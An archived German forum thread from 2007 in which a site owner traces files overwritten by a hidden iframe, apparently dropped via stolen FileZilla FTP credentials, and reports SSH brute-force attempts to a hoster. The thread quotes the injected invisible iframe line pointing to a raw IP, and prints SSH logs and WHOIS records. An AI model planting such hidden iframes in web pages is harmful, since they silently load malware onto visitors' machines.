PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : index.php und adminforce/index.php



valkox
22.05.2007, 19:05
Hallo

Währe klasse wenn mir irgend jemand mal helfen könnte,

Schon eine ganze weile, überschreibt jemand meine Index.php mit einem iframe code
und das in der untersten zeile.

Das passiert im hauptordner mit index.php und adminforce/index.php

Wenn der iframe code wieder erscheint, werde ich den mal posten

vielleicht hat auch jemand eine Idee wie ich das überschreiben von Dateien auf dem server unterbinden kann.

Danke schon mal

EarlofMidnight
22.05.2007, 19:37
Mal versucht die FTP Passwörter zu ändern, sonst gibt es kaum möglichkeiten Dateien zu überschreiben.

Gruß

EarlofMidnight

valkox
22.05.2007, 21:02
die hab ich nun schon zweimal geändert und erraten ist bei
PW mit 13 Stellen kaum möglich

Selbst im Ftp Programm, steht ein zugriff auf die dateien,
Datum und Uhrzeit.

Aber genau da bin ich auf der Arbeit.

EarlofMidnight
22.05.2007, 21:54
Wird die IP geloggt?
Erfolgt der Zugriff über FTP?

valkox
22.05.2007, 23:07
Nein die Ip wird leider nicht geloggt,

Ob es über FTP ist kann ich dir nicht sagen.


Wenn du mir sagen kannst wie und wo ich das ablesen kann
währe ich dir sehr verbunden.

valkox
22.05.2007, 23:22
So ich lasse jetzt den server 24STD überwachen um zugriffe und IP zu Protikolieren.

Wenn Irgend jemand über FTP zugreift, werd ich das sehen.

Wenn nicht, ist es ein script Problem.

swinxx
23.05.2007, 12:47
Hmm, das dein PW 13 Stellen hat heisst nicht unbeding das es sicher ist !! 13 Stellen sind auch nciht unbeding viel, ab 40 oder 50 Stellen seh ich das als viel an !

Lasse dir Passwörter von Programmen wie Keypass usw. erstellen und speichere siese dann ab. Wenn das Script das erlaubt am besten auch Sonderzeichen nehmen ( §$%& usw ) die werden von PW Crackprogrammen als letztes durchforstet...

cu, Swinxx

valkox
23.05.2007, 18:03
Danke Swinxx

aberich bin sicher, das es sicher ist, es ist mit sonderzeichen und groß klein schreibung.

Allerdings wundere ich mich richtig schwer.

5 Dateien wurden überschrieben und hinzugefügt und das nicht von mir

adminforce/index.php (überschrieben)
index.php (überschrieben)
lib/index.htm (hinzugefügt)
lib/schittstellen/index.htm (hinzugefügt)
lib/texte/index.htm (hinzugefügt)


dies stand in der index.htm von lib/schitstellen/index.htm

*edit

mal gelöscht,sonst kommt noch jemand auf dumme Ideen





dieser ist der Iframe code



<iframe src='http://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>



Eines kann ich definitif sagen, es wurde von gestern abend bis jetzt keine FTP verbindung auf gebaut, das hätte ich nun gesehen, es überschreibt einer die Daten aber ichw eis nicht wo der Fehler liegt.

EarlofMidnight
23.05.2007, 18:44
Hab grad was zu der IP gefunden: http://www.abakus-internet-marketing.de/foren/viewtopic/p-356627.html

Bist anscheinend nicht der einzigste der netten Besuch hatte.

Gruß
EarlofMidnight

P.s. les dir den Thread mal genz durch, da geht es um nen Virus

swinxx
23.05.2007, 18:54
Na toll, sind wohl wieder mal einige nette Leute im Netz unterwegs !

cu, swinxx

EarlofMidnight
23.05.2007, 19:00
*edit*
Bitte kein Veröffentlichen von Whois Abfragen

valkox
23.05.2007, 19:03
wenn man mal weiter sucht,
ist fileZilla davon betrofn, der virus
logt die zugansdaten von FILEZILLA
und schickt die ab.

echt was fürn deck

da erd ich wohlden sever neu aufetzten dürfen.
Denn sicher is sicher

Diablo2k
23.05.2007, 19:08
so wie ich das weiß passiert das nur durch den ie, benutzt du den ??

wenn da dann selbst schuld jeder weiß das der ie ein schweizer käse ist

valkox
23.05.2007, 19:13
ganz sicher benutz ich kein IE

Eher den firefox

valkox
23.05.2007, 19:16
und wenn man weiter schaut


Address lookup
lookup failed 27.149.95.81
Could not find a domain name corresponding to this IP address.
Domain Whois record

Don't have a domain name for which to get a record
Network Whois record

Queried whois.arin.net with "27.149.95.81"...

OrgName: Internet Assigned Numbers Authority
OrgID: IANA
Address: 4676 Admiralty Way, Suite 330
City: Marina del Rey
StateProv: CA
PostalCode: 90292-6695
Country: US

NetRange: 27.0.0.0 - 27.255.255.255
CIDR: 27.0.0.0/8
NetName: RESERVED-27
NetHandle: NET-27-0-0-0-1
Parent:
NetType: IANA Reserved
Comment:
RegDate:
Updated: 2002-09-12

OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName: Internet Corporation for Assigned Names and Number
OrgAbusePhone: +1-310-301-5820
OrgAbuseEmail: abuse@iana.org

OrgTechHandle: IANA-IP-ARIN
OrgTechName: Internet Corporation for Assigned Names and Number
OrgTechPhone: +1-310-301-5820
OrgTechEmail: abuse@iana.org

# ARIN WHOIS database, last updated 2007-05-22 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records

DNS query for 81.95.149.27.in-addr.arpa returned an error from the server: NameError

No records to display




kommt sogar noch das dabei raus
US und CA

woherwohl sonst die amies

EarlofMidnight
23.05.2007, 19:21
Hab mich grad noch durch ein paar Foren geklickt,
soweit Ich es bisher mitbekommen habe ist es nicht ein "Angriff" auf deine Seite sondern der ganze Server ist betroffen.
Es werden allem Anschein nach alle Index Dateien die auf dem jeweiligen Server liegen um den I-Frame "erweitert", daher ist auch deine Index vom Adminforce betroffen und es gibt keinen FTP Zugriff im Log.

Gruß

EarlofMidnight

valkox
23.05.2007, 19:24
ja genau das mein ich ja.

Keine FTP verbindung wird aufgebaut, meine log zeigt nur an das sich dateien verändert oder aktualisier haben aber keine verbinung zum server aufgebaut wurde

wie kann man dateien erweitern/überschreiben ohne FTP verbindung ?


cih werde wieder Mein HackScan laufen lassen.

Ich habe meinen rechner schon auf viren/trojaner laufen lassen, keine egebnisse.
Spyware oder Malware hatte ich zwei aber aus sicherheitgründen ab ich die gleich mal gelöscht genau so wie FILEZILA der is erst einmal runter geschmissen mit allen einzelheiten.

EarlofMidnight
23.05.2007, 19:26
Über den Admin Serverzugang anscheinend, kenn mich da aber nicht mehr ganz so gut aus da Ich bisher mit Serveradministration wenig zu tun hatte.

Gruß

ErlofMidnight

valkox
23.05.2007, 19:31
ich kann dir sagen von der zeit von 7:45 - 14:30 Uhr war niergends ein zugriff aufdem server selber weder admin User FTP nichts das is was mich verwundert.

erstmal hab ich ale Daten die beschrieben wurden gelöscht oder neuaufgesetzt.

mein rechner arbeitet gerade in voller kapazität was vieleichtversteckt sein könnte.
gleich gebichauf nd mach ales neu.

valkox
23.05.2007, 22:02
so jetzt hab ich mal meinen hintern bewegt und was ins rollen gebracht und raus kahm das hier






*edit
werde ich später posten

valkox
24.05.2007, 21:43
so nun gehts

das is aus meiner LOG Datei


Failed password for illegal user dorotheee from 217.72.130.81 port 35924 ssh2
May 24 19:12:41 pv382 sshd[27972]: Illegal user dorotheee from 217.72.130.81
May 24 19:12:41 pv382 sshd[27972]: error: Could not get shadow information for NOUSER
May 24 19:12:41 pv382 sshd[27972]: Failed password for illegal user dorotheee from 217.72.130.81 port 36133 ssh2
May 24 19:12:42 pv382 sshd[28039]: Illegal user dorotheee from 217.72.130.81
May 24 19:12:42 pv382 sshd[28039]: error: Could not get shadow information for NOUSER
May 24 19:12:42 pv382 sshd[28039]: Failed password for illegal user dorotheee from 217.72.130.81 port 36288 ssh2
May 24 19:12:42 pv382 sshd[28085]: Illegal user dorotheee from 217.72.130.81
May 24 19:12:42 pv382 sshd[28085]: error: Could not get shadow information for NOUSER
May 24 19:12:42 pv382 sshd[28085]: Failed password for illegal user dorotheee from 217.72.130.81 port 36432 ssh2
May 24 19:12:42 pv382 sshd[28141]: Illegal user dorotheee from 217.72.130.81
May 24 19:12:42 pv382 sshd[28141]: error: Could not get shadow information for NOUSER



die nachrichten, legen sich sekündlich weiter


die Ip sagt mir das heir



Network Whois record

Queried whois.ripe.net with "-B 217.72.130.81"...

% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '217.72.130.0 - 217.72.130.255'

inetnum: 217.72.130.0 - 217.72.130.255
netname: NETGATE-CUSTOMERS-NET
descr: NetGate Internetservice
descr: Hummelsbuetteler Steindamm 78a
descr: D-22851 Norderstedt
country: DE
admin-c: MR487-RIPE
tech-c: JT339-RIPE
status: ASSIGNED PA
notify: ripe-ip@netgate.de
mnt-by: NETGATE-MNT
changed: surke@netgate.de 20031028
source: RIPE

person: Matthias Rojahn
address: NetGate Internetservice Matthias Rojahn
address: Barkhausenweg 11
address: 22339 Hamburg
address: Germany
phone: +49 40 5298970
fax-no: +49 40 52989722
e-mail: mrojahn@netgate.de
nic-hdl: MR487-RIPE
mnt-by: NETGATE-MNT
changed: surke@netgate.de 20050831
source: RIPE

person: Jan Tegtmeier
address: NetGate Internetservice
address: Barkhausenweg 11
address: 22339 Hamburg
address: Germany
phone: +49 40 5298970
fax-no: +49 40 52989722
e-mail: tegtmeier@ngate.de
nic-hdl: JT339-RIPE
mnt-by: NETGATE-MNT
changed: mpradhan@primustel.co.uk 20050606
changed: surke@netgate.de 20050831
source: RIPE

% Information related to '217.72.128.0/20AS174'

route: 217.72.128.0/20
descr: DE-NETGATE via Cogent
origin: AS174
mnt-by: COGENT-ROUTE-MNT
mnt-by: NETGATE-MNT
mnt-routes: TELIANET-RR
changed: ukieber@cogentco.com 20041124
changed: surke@netgate.de 20050927
source: RIPE

% Information related to '217.72.128.0/20AS1299'

route: 217.72.128.0/20
descr: DE-NETGATE
remarks: Abuse issues should be reported
remarks: to abuse@telia.com
origin: AS1299
mnt-by: TELIANET-RR
changed: rr@telia.net 20050929
source: RIPE




was nun tun ?

Einachanrufen, es sieht ir so aus,das mein sever dauernd an gepingt wird.

was kann ich tun ?

hpshstein
24.05.2007, 21:54
sieht eher danach aus als dass die dein passwort rausfinden wollen über ssh-zugriff ;)

solltest einfach dei ip beim hoster sperren lassen und fertig.

EarlofMidnight
24.05.2007, 22:08
Hallo!

Ich würde dort anrufen!
Denn die IP gehört ihnen aber da sie Serverhosting anbieten vermute Ich eher das es ein Kunde von denen ist der dir versucht den Server zu knacken, die sollten sich dann darum kümmern können.

Gruß

EarlofMidnight

valkox
24.05.2007, 22:14
werdich wohl alles veranlagen,
aber dazu kommt noch diese

Address lookup
canonical name 195.180.233.220.exetel.com.au.
aliases
addresses 220.233.180.195
Domain Whois record

Queried whois.ausregistry.net with "exetel.com.au"...

Domain Name: exetel.com.au
Last Modified: 09-May-2007 01:35:14 UTC
Registrar ID: R00012-AR
Registrar Name: TPP Internet
Status: OK

Registrant: Exetel Pty Ltd
Registrant ID: ACN 097986546

Eligibility Type: Company

Registrant ROID: C5068810-AR
Registrant Contact Name: Steve Waddington
Registrant Email: Visit whois.ausregistry.com.au for Web based WhoIs

Tech ID: C5068820-AR
Tech Name: Exetel Hostmaster
Tech Email: Visit whois.ausregistry.com.au for Web based WhoIs

Name Server: ns1.exetel.com.au
Name Server IP: 220.233.0.1
Name Server: ns2.exetel.com.au
Name Server IP: 220.233.0.2


Network Whois record

Queried whois.apnic.net with "220.233.180.195"...

% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 220.233.0.0 - 220.233.255.255
netname: EXETEL
descr: Internet Service Provider, Australia.
country: AU
admin-c: EH122-AP
tech-c: EH122-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-AU-EXETEL
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20040209
changed: hm-changed@apnic.net 20060130
source: APNIC

role: Exetel Hostmaster
address: Exetel Pty Ltd.
address: Level 4
address: 275 Alfred Street
address: North Sydney NSW 2061
country: AU
phone: +61 2 9954 6622
fax-no: +61 2 9964 9318
e-mail: hostmaster@exetel.com.au
trouble: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
trouble: Send all spam and abuse reports to abuse@exetel.com.au
trouble: .
trouble: Please include detailed information such as full message
trouble: headers and times in UTC
trouble: --
trouble: Send all network related issues such as routing to
trouble: noc@exetel.com.au
trouble: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
admin-c: SW14-AP
tech-c: SW14-AP
nic-hdl: EH122-AP
remarks: Australian Internet Service Provider (ISP)
remarks: http://www.exetel.com.au
notify: hostmaster@exetel.com.au
mnt-by: MAINT-AU-EXETEL
changed: hm-changed@apnic.net 20060130
source: APNIC


deser server verbindet sich über den Ftp

EarlofMidnight
24.05.2007, 22:22
Sind da noch mehr?

valkox
24.05.2007, 22:31
ne das sind nur die beiden,

der von Netgate versucht die PWs zu lesen über ssh2 und der andere Logt sich ein über FTP

Netgate war sogar geradenoch erreichbar und recht freundlich.
Versuchen das Problem mit zu beeben.

valkox
25.05.2007, 22:27
So geb nun mal ein statement ab:

Antowort des Supports:

Sehr geehrter Herr Hess,
Danke für die Informationen. Wir haben den Rechner gleich nach unserem Gespräch
untersucht und Hinweise für illegales Verhalten gefunden. Die Maschine wurde
gesperrt.



finde mal das sollte nach einem Telefonat und dabei sofortiger Sperreung
mal ein lob verdient hat.

Keine Stunde war rum und alles war in ordnung.

hpshstein
26.05.2007, 14:36
tjo würdest du zur Polizei gehn und Anzeige erstatten und denen sagen, dass der Hoster davon wusste, würds für den sicher nicht billiger werden :D

Und den australischen Freund würd ich einfach von meinem Hoster sperren lassen X(

Denn die sind vermutlich nicht so kooperativ :D

valkox
26.05.2007, 17:08
nee gewusst denke ich haben die das nicht, Netgate vermietet server und Webspace.
Einfach mal sahgen Negate wusste das...
nee so weit muss ich da auch nicht gehen

Einer der Vermietenden server war das und ich dneke nicht das die das wussten.
Allerding war nach einer Stunde alles behoben der server gesperrt und ich hatte meine ruhe.
Nun hoffe ich mal, das einige mit ruhe haben, da sich nach 2-3 Tagen einige Foren Beiträge gehäuft haben zu dem gleichem Problem.

Davon betrofen waren uch WBB und phpbb Foren, war wohl ein allround teil.